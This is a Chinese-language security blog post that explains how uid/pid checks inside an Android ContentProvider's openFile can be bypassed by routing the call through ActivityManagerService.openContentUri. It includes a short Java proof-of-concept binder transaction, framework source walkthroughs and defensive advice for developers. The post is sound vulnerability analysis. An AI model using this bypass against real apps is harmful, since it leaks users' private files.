<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="cn">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="android,android application,content provider,">










<meta name="description" content="Overview该技巧来源是我偶然间被推送的一条小蓝鸟：  当在ContentProvider的openFile方法内使用CallingUid或是CallingPid进行校验，是一种不合规范且不安全的权限校验方式，有被绕过的可能性。攻击者可以获取到一个只读的文件对象，造成文件泄漏。 复现 &amp;amp; 利用限制复现方式比较简单，利用ActivityMangerService中的openContent">
<meta name="keywords" content="android,android application,content provider">
<meta property="og:type" content="article">
<meta property="og:title" content="ContentProvider openFile 内部校验的绕过方式">
<meta property="og:url" content="http://N1rv0us@github.io/2022/08/10/ContentProvider-openFile娱乐绕过方式/index.html">
<meta property="og:site_name" content="失眠想睡觉的blog">
<meta property="og:description" content="Overview该技巧来源是我偶然间被推送的一条小蓝鸟：  当在ContentProvider的openFile方法内使用CallingUid或是CallingPid进行校验，是一种不合规范且不安全的权限校验方式，有被绕过的可能性。攻击者可以获取到一个只读的文件对象，造成文件泄漏。 复现 &amp;amp; 利用限制复现方式比较简单，利用ActivityMangerService中的openContent">
<meta property="og:locale" content="cn">
<meta property="og:image" content="https://raw.githubusercontent.com/N1rv0us/N1rv0us.github.io/master/2022/08/10/ContentProvider-openFile%E5%A8%B1%E4%B9%90%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F/twitter.png">
<meta property="og:updated_time" content="2022-08-11T15:18:20.853Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ContentProvider openFile 内部校验的绕过方式">
<meta name="twitter:description" content="Overview该技巧来源是我偶然间被推送的一条小蓝鸟：  当在ContentProvider的openFile方法内使用CallingUid或是CallingPid进行校验，是一种不合规范且不安全的权限校验方式，有被绕过的可能性。攻击者可以获取到一个只读的文件对象，造成文件泄漏。 复现 &amp;amp; 利用限制复现方式比较简单，利用ActivityMangerService中的openContent">
<meta name="twitter:image" content="https://raw.githubusercontent.com/N1rv0us/N1rv0us.github.io/master/2022/08/10/ContentProvider-openFile%E5%A8%B1%E4%B9%90%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F/twitter.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://N1rv0us@github.io/2022/08/10/ContentProvider-openFile娱乐绕过方式/">





  <title>ContentProvider openFile 内部校验的绕过方式 | 失眠想睡觉的blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">失眠想睡觉的blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://N1rv0us@github.io/2022/08/10/ContentProvider-openFile娱乐绕过方式/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="N1rv0us">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="失眠想睡觉的blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ContentProvider openFile 内部校验的绕过方式</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2022-08-10T11:25:22+08:00">
                2022-08-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h2><p>该技巧来源是我偶然间被推送的一条小蓝鸟：</p>
<p><img src="https://raw.githubusercontent.com/N1rv0us/N1rv0us.github.io/master/2022/08/10/ContentProvider-openFile%E5%A8%B1%E4%B9%90%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F/twitter.png" alt="twitter.png"></p>
<p>当在<code>ContentProvider</code>的<code>openFile</code>方法内使用CallingUid或是CallingPid进行校验，是一种不合规范且不安全的权限校验方式，有被绕过的可能性。攻击者可以获取到一个只读的文件对象，造成文件泄漏。</p>
<h2 id="复现-amp-利用限制"><a href="#复现-amp-利用限制" class="headerlink" title="复现 &amp; 利用限制"></a>复现 &amp; 利用限制</h2><p>复现方式比较简单，利用<code>ActivityMangerService</code>中的<code>openContentUri</code>接口可以拿到一个文件对象：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pls check it in android.app.IActivityManager</span></span><br><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">int</span> TRANSACTION_openContentUri = <span class="number">1</span>; </span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">poc</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        IBinder binder = getService(<span class="string">"activity"</span>);</span><br><span class="line"></span><br><span class="line">        Parcel data = Parcel.obtain();</span><br><span class="line">        Parcel reply = Parcel.obtain();</span><br><span class="line">        String description = binder.getInterfaceDescriptor();</span><br><span class="line">        Log.e(TAG,<span class="string">"connect to "</span> + description);</span><br><span class="line"></span><br><span class="line">        data.writeInterfaceToken(description);</span><br><span class="line">        data.writeString(<span class="string">"content://com.n1rv0us.test/"</span>);</span><br><span class="line"></span><br><span class="line">        binder.transact(TRANSACTION_openContentUri, data, reply, <span class="number">0</span>);</span><br><span class="line">        reply.readException();</span><br><span class="line"></span><br><span class="line">    &#125; <span class="keyword">catch</span> (Throwable throwable) &#123;</span><br><span class="line">        throwable.printStackTrace();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用条件是：</p>
<ul>
<li><p>需要目标ContentProvider是一个导出的组件</p>
</li>
<li><p>在目标<code>ContentProvider</code> 的 <code>openFile</code>接口内利用 uid/pid 或其关联的permission来鉴权；</p>
</li>
</ul>
<p>利用效果：</p>
<ul>
<li>调用者可以使用<code>system_server</code>(shareUid=1000), 来访问<code>openFile</code>接口；</li>
</ul>
<h2 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h2><p>以下所有代码片段均可在<a href="https://cs.android.com/" target="_blank" rel="noopener">https://cs.android.com/</a> 中找到对应的内容；</p>
<p>poc中拿到与AMS通信用的binder对象后，调用了<code>openContentUri</code>即会转交到AMS的对应方法中做处理：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// frameworks/base/services/core/java/com/android/server/am/ActivityManagerService.java</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> ParcelFileDescriptor <span class="title">openContentUri</span><span class="params">(String uriString)</span> <span class="keyword">throws</span> RemoteException </span>&#123;</span><br><span class="line">    enforceNotIsolatedCaller(<span class="string">"openContentUri"</span>);</span><br><span class="line">    <span class="keyword">final</span> <span class="keyword">int</span> userId = UserHandle.getCallingUserId();</span><br><span class="line">    <span class="keyword">final</span> Uri uri = Uri.parse(uriString);</span><br><span class="line">    String name = uri.getAuthority();</span><br><span class="line">    ContentProviderHolder cph = mCpHelper.getContentProviderExternalUnchecked(name, <span class="keyword">null</span>,</span><br><span class="line">            Binder.getCallingUid(), <span class="string">"*opencontent*"</span>, userId);   <span class="comment">// 获取对应的ContentProviderHolder</span></span><br><span class="line">    ParcelFileDescriptor pfd = <span class="keyword">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (cph != <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// This method is exposed to the VNDK and to avoid changing its</span></span><br><span class="line">            <span class="comment">// signature we just use the first package in the UID. For shared</span></span><br><span class="line">            <span class="comment">// UIDs we may blame the wrong app but that is Okay as they are</span></span><br><span class="line">            <span class="comment">// in the same security/privacy sandbox.</span></span><br><span class="line">            <span class="keyword">final</span> <span class="keyword">int</span> uid = Binder.getCallingUid();</span><br><span class="line">            <span class="comment">// Here we handle some of the special UIDs (mediaserver, systemserver, etc)</span></span><br><span class="line">            <span class="keyword">final</span> String packageName = AppOpsManager.resolvePackageName(uid,</span><br><span class="line">                    <span class="comment">/*packageName*/</span> <span class="keyword">null</span>);</span><br><span class="line">            <span class="keyword">final</span> AndroidPackage androidPackage;</span><br><span class="line">            <span class="keyword">if</span> (packageName != <span class="keyword">null</span>) &#123;</span><br><span class="line">                androidPackage = mPackageManagerInt.getPackage(packageName);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                androidPackage = mPackageManagerInt.getPackage(uid);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (androidPackage == <span class="keyword">null</span>) &#123;</span><br><span class="line">                Log.e(TAG, <span class="string">"Cannot find package for uid: "</span> + uid);</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">final</span> AttributionSource attributionSource = <span class="keyword">new</span> AttributionSource(</span><br><span class="line">                    Binder.getCallingUid(), androidPackage.getPackageName(), <span class="keyword">null</span>);  <span class="comment">// 整理调用者信息</span></span><br><span class="line">            pfd = cph.provider.openFile(attributionSource, uri, <span class="string">"r"</span>, <span class="keyword">null</span>);  <span class="comment">// 以read模式调用openFile</span></span><br><span class="line">        &#125; <span class="keyword">catch</span> (FileNotFoundException e) &#123;</span><br><span class="line">            <span class="comment">// do nothing; pfd will be returned null</span></span><br><span class="line">        &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">            <span class="comment">// Ensure we're done with the provider.</span></span><br><span class="line">            mCpHelper.removeContentProviderExternalUnchecked(name, <span class="keyword">null</span>, userId);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        Slog.d(TAG, <span class="string">"Failed to get provider for authority '"</span> + name + <span class="string">"'"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> pfd;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先获取到目标Provider的<code>ContentProviderHolder</code> 将调用者的信息全部整理到<code>AttributionSource</code> 后调用provider的openFile：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// frameworks/base/core/java/android/content/ContentProvider.java</span></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="function"><span class="keyword">public</span> ParcelFileDescriptor <span class="title">openFile</span><span class="params">(@NonNull AttributionSource attributionSource,</span></span></span><br><span class="line"><span class="function"><span class="params">                Uri uri, String mode, ICancellationSignal cancellationSignal)</span></span></span><br><span class="line"><span class="function">                <span class="keyword">throws</span> FileNotFoundException </span>&#123;</span><br><span class="line">            uri = validateIncomingUri(uri);</span><br><span class="line">            uri = maybeGetUriWithoutUserId(uri);</span><br><span class="line">            enforceFilePermission(attributionSource, uri, mode);  <span class="comment">// 检查调用者对于uri的读写权限；本案例中仅会检查读权限</span></span><br><span class="line">            traceBegin(TRACE_TAG_DATABASE, <span class="string">"openFile: "</span>, uri.getAuthority());</span><br><span class="line">            <span class="keyword">final</span> AttributionSource original = setCallingAttributionSource(</span><br><span class="line">                    attributionSource);</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> mInterface.openFile(</span><br><span class="line">                        uri, mode, CancellationSignal.fromTransport(cancellationSignal));  <span class="comment">// 移交到对应的openFile函数做处理；</span></span><br><span class="line">            &#125; <span class="keyword">catch</span> (RemoteException e) &#123;</span><br><span class="line">                <span class="keyword">throw</span> e.rethrowAsRuntimeException();</span><br><span class="line">            &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">                setCallingAttributionSource(original);</span><br><span class="line">                Trace.traceEnd(TRACE_TAG_DATABASE);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>值得注意的是，该<code>openFile</code>方法并不是开发者经常Override的接口，开发者常用的接口在后续的中.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// frameworks/base/core/java/android/content/ContentProvider.java</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="meta">@Nullable</span> <span class="function">ParcelFileDescriptor <span class="title">openFile</span><span class="params">(@NonNull Uri uri, @NonNull String mode,</span></span></span><br><span class="line"><span class="function"><span class="params">            @Nullable CancellationSignal signal)</span> <span class="keyword">throws</span> FileNotFoundException </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> openFile(uri, mode);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 我们通常会Override下面这个方法</span></span><br><span class="line">    <span class="keyword">public</span> <span class="meta">@Nullable</span> <span class="function">ParcelFileDescriptor <span class="title">openFile</span><span class="params">(@NonNull Uri uri, @NonNull String mode)</span></span></span><br><span class="line"><span class="function">            <span class="keyword">throws</span> FileNotFoundException </span>&#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> FileNotFoundException(<span class="string">"No files supported by provider at "</span></span><br><span class="line">                + uri);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>综上，当此时调用<code>Binder.getCallingUid</code>的时候，拿到的就会是system_server的uid而非实际调用者的uid。</p>
<h2 id="告警与反思"><a href="#告警与反思" class="headerlink" title="告警与反思"></a>告警与反思</h2><p>从Android对于ContentProvider的openFile接口的设计角度，使用<code>Binder.getCallingUid</code> 的方式来获取调用者的uid是不准确的。让我们回顾下，Android系统是如何做鉴权的：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// frameworks/base/core/java/android/content/ContentProvider.java</span></span><br><span class="line">        <span class="meta">@PermissionCheckerManager</span>.PermissionResult</span><br><span class="line">        <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">enforceFilePermission</span><span class="params">(@NonNull AttributionSource attributionSource,</span></span></span><br><span class="line"><span class="function"><span class="params">                Uri uri, String mode)</span></span></span><br><span class="line"><span class="function">                <span class="keyword">throws</span> FileNotFoundException, SecurityException </span>&#123;</span><br><span class="line">            <span class="keyword">if</span> (mode != <span class="keyword">null</span> &amp;&amp; mode.indexOf(<span class="string">'w'</span>) != -<span class="number">1</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (enforceWritePermission(attributionSource, uri)  <span class="comment">// 检查写权限</span></span><br><span class="line">                        != PermissionChecker.PERMISSION_GRANTED) &#123;</span><br><span class="line">                    <span class="keyword">throw</span> <span class="keyword">new</span> FileNotFoundException(<span class="string">"App op not allowed"</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">if</span> (enforceReadPermission(attributionSource, uri)  <span class="comment">// 检查读权限</span></span><br><span class="line">                        != PermissionChecker.PERMISSION_GRANTED) &#123;</span><br><span class="line">                    <span class="keyword">throw</span> <span class="keyword">new</span> FileNotFoundException(<span class="string">"App op not allowed"</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="meta">@PermissionCheckerManager</span>.PermissionResult</span><br><span class="line">        <span class="function"><span class="keyword">private</span> <span class="keyword">int</span> <span class="title">enforceReadPermission</span><span class="params">(@NonNull AttributionSource attributionSource, Uri uri)</span></span></span><br><span class="line"><span class="function">                <span class="keyword">throws</span> SecurityException </span>&#123;</span><br><span class="line">            <span class="keyword">final</span> <span class="keyword">int</span> result = enforceReadPermissionInner(uri, attributionSource);</span><br><span class="line">            <span class="keyword">if</span> (result != PermissionChecker.PERMISSION_GRANTED) &#123;</span><br><span class="line">                <span class="keyword">return</span> result;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Only check the read op if it differs from the one for the permission</span></span><br><span class="line">            <span class="comment">// we already checked above to avoid double attribution for every access.</span></span><br><span class="line">            <span class="keyword">if</span> (mTransport.mReadOp != AppOpsManager.OP_NONE</span><br><span class="line">                    &amp;&amp; mTransport.mReadOp != AppOpsManager.permissionToOpCode(mReadPermission)) &#123;</span><br><span class="line">                <span class="keyword">return</span> PermissionChecker.checkOpForDataDelivery(getContext(),</span><br><span class="line">                        AppOpsManager.opToPublicName(mTransport.mReadOp),</span><br><span class="line">                        attributionSource, <span class="comment">/*message*/</span> <span class="keyword">null</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> PermissionChecker.PERMISSION_GRANTED;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>由于本次的访问是经过system_server进行了一次转发，因此，完整的callingUids应当是<code>Binder.getCallingUid</code> + <code>AttributionSource</code>中所包含的uid信息；</p>
<p>对于一个Android开发者，建议尽量依赖系统本身提供的机制来完成访问控制，如组件的导出(exported)以及grantUriPermission机制。</p>
<h2 id="REFERENCE"><a href="#REFERENCE" class="headerlink" title="REFERENCE"></a>REFERENCE</h2><p>感谢@炜唯提供的帮助与指导～</p>
<ul>
<li>twitter : <a href="https://twitter.com/_bagipro/status/1555594672571031552?s=21&amp;t=gxLsPQKbAaIZqKiCgsowsw" target="_blank" rel="noopener">https://twitter.com/_bagipro/status/1555594672571031552?s=21&amp;t=gxLsPQKbAaIZqKiCgsowsw</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/android/" rel="tag"># android</a>
          
            <a href="/tags/android-application/" rel="tag"># android application</a>
          
            <a href="/tags/content-provider/" rel="tag"># content provider</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/08/07/NCScope-论文笔记/" rel="next" title="NCScope 论文阅读笔记">
                <i class="fa fa-chevron-left"></i> NCScope 论文阅读笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2022/08/17/CVE-2015-3636复现与分析/" rel="prev" title="CVE-2015-3636复现与分析">
                CVE-2015-3636复现与分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">N1rv0us</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Overview"><span class="nav-number">1.</span> <span class="nav-text">Overview</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#复现-amp-利用限制"><span class="nav-number">2.</span> <span class="nav-text">复现 &amp; 利用限制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用原理"><span class="nav-number">3.</span> <span class="nav-text">利用原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#告警与反思"><span class="nav-number">4.</span> <span class="nav-text">告警与反思</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#REFERENCE"><span class="nav-number">5.</span> <span class="nav-text">REFERENCE</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">N1rv0us</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
